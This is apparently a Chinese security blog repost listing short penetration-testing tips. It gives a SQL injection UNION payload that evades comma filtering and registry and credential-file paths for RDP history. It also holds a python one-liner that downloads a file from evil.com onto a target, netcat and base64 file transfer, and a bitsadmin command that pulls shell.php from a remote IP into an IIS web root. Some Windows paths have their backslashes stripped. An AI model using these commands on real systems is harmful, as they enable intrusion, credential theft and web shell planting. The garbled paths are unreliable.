1233211234567

admin
admin
admin
102262
文章
87
评论
2021年11月18日23:19:53评论78 views字数 767阅读2分33秒阅读模式

分享几个tips,不记得哪里找的了。


注入过滤逗号

127' UNION SELECT * FROM ((SELECT1)a JOIN (SELECT2)b JOIN (SELECT3)c JOIN (SELECT4)d JOIN (SELECT5)e)# 

相当于 union select 1,2,3,4,5


注册表查看rdp记录

[HKEY_USERSS-1-5-21-1387774393-1596258019-1651181295-500SoftwareMicrosoftTerminal Server ClientDefault]

C:Documents and SettingsAdministratorAppDataLocalMicrosoftCredentials


只反弹个shell,传文件

curl ,ftp,wget,nc

python -c 'import urllib;urllib.urlretrieve("http://evil.com/evil.file","/path/to/save/evil.file")'

nc 'BASE64' | base64 -d > xxx


powershell读写文件

读文本文件:

$file = Get-Content "1.txt"

写文本文件:

Set-content "1.txt" "wocao"

读二进制文件:

[System.IO.File]::ReadAllBytes('1.exe')

写二进制文件:

[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes)


下载文件

 windows:  bitsadmin /transfer n http://192.168.1.1/shell.php c:inetpubwwwrootshell.php

本文始发于微信公众号(关注安全技术):1233211234567

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月18日23:19:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   1233211234567http://cn-sec.com/archives/501686.html

发表评论

匿名网友 填写信息